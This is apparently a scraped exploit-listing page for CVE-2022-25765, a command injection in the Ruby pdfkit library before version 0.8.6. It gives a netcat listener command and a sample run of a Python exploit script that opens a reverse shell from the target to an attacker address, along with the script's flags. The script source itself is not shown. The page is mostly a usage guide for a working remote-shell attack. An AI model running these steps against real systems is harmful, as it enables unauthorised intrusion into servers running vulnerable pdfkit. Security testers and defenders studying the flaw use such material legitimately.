Exploit for CVE-2022-25765

Name: Exploit for CVE-2022-25765
Rating: 5 (1470 reviews)

2023-01-29 | CVSS 7.5

## https://sploitus.com/exploit?id=38A6D118-ABAB-59DD-9EA2-5FD83636A6BE
# PDFkit-CMD-Injection (CVE-2022-25765)
Exploit for **CVE-2022-25765** command injection in pdfkit &lt; 0.8.6

See more details about the vulnerability [here](https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795)

## PoC

Run the netcat on your host:
``` 
$ nc -lvnp 1337
``` 

Run the exploit (example):
``` 
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
``` 

Flags:
``` 
-t, --target  Address of target in http-format
-a, --addr    Address for reverse connect
-p, --port    Port for reverse connect, 9001 by default       
```